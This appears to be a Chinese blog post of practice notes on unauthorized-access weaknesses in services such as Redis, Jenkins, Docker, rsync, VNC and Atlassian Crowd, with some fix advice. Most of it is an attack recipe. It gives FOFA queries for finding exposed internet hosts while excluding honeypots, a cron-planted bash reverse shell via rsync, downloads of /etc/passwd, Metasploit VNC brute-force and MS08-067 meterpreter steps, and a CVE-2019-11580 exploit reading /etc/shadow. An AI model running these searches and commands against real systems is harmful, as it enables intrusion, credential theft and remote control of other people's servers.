未授权访问练习

Redis未授权访问漏洞

kali安装Redis:

apt-get install redis

redis使用:

redis-cli -h 192.168.4.176 -p 6379

使用工具可以连接存在未授权的redis

 https://github.com/n0b0dyCN/redis-rogue-server
1 python3 redis-rogue-server.py --rhost 192.168.4.176 --lhost 192.168.4.108

MongoDB未授权访问漏洞

在kali搭建环境:

拉取镜像:

docker pull mongo

启动容器:

docker run -d -p 27017:27017 --name mongodb mongo

查看容器:

docker ps -a

使⽤Nmap的插件脚本进⾏扫描...发现存在未授权访问漏洞

nmap -p 27017 --script mongodb-info 127.0.0.1

尝试navicat连接:

Memcached未授权访问漏洞

下载Memcached 并启用环境

memcached.exe -d install
memcached.exe -d start

使⽤Telnet探测⽬标的11211端⼝...

stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 39 0 //获得缓存key
get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造
成敏感信息泄露

使⽤Nmap程序的脚本进⾏漏洞扫描....

1 nmap -p 11211 --script memcached-info 192.168.4.199

存在未授权!

Zookeeper未授权访问漏洞

可以使用fofa搜索

port="2181"

在Kali中使⽤以下命令进⾏未授权访问漏洞测试..

echo envi | nc ip 端口

可使⽤Zookeeper可视化管理⼯具进⾏连接...

Jenkins未授权访问漏洞

fofa搜索:

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

打开之后->Manage Jenkins->Scritp Console

执行命令:

println "whoami" .execute().text

Jupyter NoteBook未授权访问漏洞

fofa:

"Jupyter Notebook" && port="8888"

vulhub靶场

cd /vulhub/jupyter/notebook-rce
docker-compose up -d

还可以新建一个终端:

Elasticsearch未授权访问漏洞

fofa

"Elasticsearch" && port="9200"

存在未授权访问则直接进⼊到信息⻚⾯

漏洞修复:

访问控制策略,限制IP访问,绑定固定IP

在 config/elasticsearch.yml 中为9200端⼝设置认证等

Kibana未授权访问漏洞

fofa

"kibana" && port="5601"

Docker Remote API未授权访问漏洞

fofa

port="2375"

使用浏览器访问路径:

http:ip:2375/version        #查看版本信息

http:ip:2375/info              #查看容器信息

Kubernetes Api Server未授权访问漏洞

fofa

port="8080" && app="Kubernetes"

直接访问 8080 端⼝会返回可⽤的 API 列表...

漏洞修复:

1.进行授权认证

2.使⽤Service Account令牌

3.配置防火墙策略

Hadoop未授权访问漏洞

fofa:

port="8088" && app="Hadoop"

开启⻚⾯直接访问不经过⽤户密码验证..

漏洞修复:

1.如⽆必要,关闭 Hadoop Web 管理页面

2.开启身份验证,防止未经授权⽤户访问。

3.设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端⼝对公网全部禁⽌或限制可信任的 IP 地址才能访问包括 50070 以及 WebUI 等相关端⼝。

ActiveMQ未授权访问漏洞

fofa:

body="ActiveMQ" && port="8161"

ActiveMQ默认使⽤8161端⼝,默认⽤户名和密码是 admin/admin

  

漏洞修复:

1.ActiveMQ的安全配置分为控制台安全配置和后台安全配置。控制台安全配置是指⽤户通过浏览器登 录ActiveMQ管理界⾯,对ActiveMQ进⾏管理的⼀个安全配置;主要是添加⽤户和密码。后台安全 配置是指程序通过ActiveMQ发送消息的⼀个安全配置

2.ActiveMQ后台安全配置。配置置连接ActiveMQ的⽤户名和密码,如果不设置ActiveMQ安全机制, 任何知道ActiveMQ服务的IP、端⼝和消息地址的⼈,都可以接受和发送消息

RabbitMQ未授权访问漏洞

fofa:

port="15672" 
port="15692" 
port="25672"

在打开的⻚⾯中可输⼊默认的账号密码 guest

漏洞修复:

1.修改为强密码,删除默认账号guest

2.禁止对外开放,设置为仅自己访问

Springboot Actuator未授权访问漏洞

fofa:

icon_hash="116323821"

漏洞修复:

1.禁⽤/env接⼝。

2.升级到Springboot actuator 2.0

3.禁止对外开放

FTP未授权访问漏洞(匿名登陆)

可以直接 ftp ip 

账号密码都是 Anonymous

匿名登录

漏洞修复:

1.禁止匿名登录

JBoss未授权访问漏洞

fofa:

title="Welcome to JBoss"

Ldap未授权访问漏洞

fofa:

port="389"

使用Ldapadmin⼯具 进行可视化

工具地址:

LDAP Admin download | SourceForge.net

Rsync未授权访问漏洞

fofa搜索:

(port="873") && (is_honeypot=false && is_fraud=false)

Vulhub中开启靶场:

cd vulhub/rsync/common
docker-compose up -d

可使⽤Nmap扫描该端⼝是否开启服务

nmap -p 873 --script rsync-list-modules ipaddress

也可以Metasploit中关于允许匿名访问的rsync 扫描模块进⾏探测..:

auxiliary/scanner/rsync/modules_list

使⽤命令进⾏链接并读取⽂件....

对系统中的敏感⽂件下载操作:

rsync rsync://IP:port/src/etc/passwd ⽬标路径

查看文件:

反弹shell...在此可利⽤定时任务cron来反弹获取shell:

查看定时任务:

rsync rsync://192.168.75.128:873/src/etc/crontab

下载定时任务文件:

rsync rsync://192.168.75.128:873/src/etc/crontab .

查看定时任务:

cat crontab

创建一个文件shell

/bin/bash -i >& /dev/tcp/192.168.75.128/4444 0>&1

上传到靶机:

rsync -av shell rsync://192.168.75.128:873/src/etc/cron.hourly

VNC未授权访问漏洞

fofa:

(port="5900") && (is_honeypot=false && is_fraud=false)

VNC未授权检测

msfdb run
use auxiliary/scanner/vnc/vnc_none_auth
show options
set rhosts IP
set threads 100
run

VNC密码爆破

use auxiliary/scanner/vnc/vnc_login
set rhosts 
set blank_passwords true
run

加载攻击模块:

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhosts 目标IP
set lhost kali的IP
set target 34
exploit

控制机器:

use exploit/multi/handler
set payload windows/vncinject/reverse_tcp
set lhost 自己IP
set rhost 目标IP
exploit

VNC链接验证...

vncviewer IP

Dubbo未授权访问漏洞

fofa:

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

使⽤Telnet进⾏链接测试:

telent IP port

NSF共享⽬录未授权访问

fofa:

"nfs"

安装nfs:

apt install nfs-common

查看服务器上的共享目录:

showmount IP

挂载相应共享⽬录到本地

mount -t nfs IP:/grdata /mnt

卸载目录:

umount /mnt

漏洞修复:

1.利用iptables限制端⼝2049和20048端⼝的访问,禁⽌外部访问

2.设置/etc/exports,对访问进⾏控制

Druid未授权访问漏洞

title="Druid Stat Index"
inurl:"druid/index.html" intitle:"Druid Stat Index"

漏洞修复:

1.配置访问账号密码

2.进制对外开放访问

CouchDB未授权访问

fofa:

(port="5984") && (is_honeypot=false && is_fraud=false)

Vulhub靶场:

cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d

执⾏未授权访问测试命令:

curl 192.168.75.128:5984

curl 192.168.75.128:5984/_config

Altassian Crowd未授权访问漏洞

环境搭建

准备⼀台linux虚拟机并执⾏以下命令下载搭建 Atlassian-crowd-3.4.3

wget https://product-downloads.atlassian.com/software/crowd/downloads/atlas
sian-crowd-3.4.3.zip

搭建Java环境并查看JDK版本

sudo apt-get install openjdk-8-jdk

查看JDK版本

Java -vesion

解压文件:

unzip atlassian-crowd-3.4.3.zip

移动⽂件atlassian-crowd-3.4.3到/var⽬录下

sudo cp -r atlassian-crowd-3.4.3 /var/
cd /var/atlassian-crowd-3.4.3/crowd-webapp/WEB-INF/classes/

修改配置文件:

sudo vi crowd-init.properties

添加信息:

crowd.home=/var/atlassian-crowd-3.4.3

开启服务:

sudo sh start_crowd.sh

点击Set up Crowd需要申请key,复制Server ID;进⼊以下官⽹并点击New Trial License申请key...

官网:

https://my.atlassian.com/products/index

进去后,填写信息和上⽅复制的Server ID,会⽣成⼀个key,复制key...

下载攻击脚本:

git clone https://github.com/jas502n/CVE-2019-11580
cd CVE-2019-11580/

执⾏攻击命令并验证

python2 CVE-2019-11580.py url
curl url/crowd/plugins/servlet/exp?cmd=cat%20/etc/s
hadow

RTSP未授权访问漏洞

fofa:

(port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"

下载安装VLC media player

打开:

漏洞修复:

1.修改默认口令

2.禁止开放到外网

  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值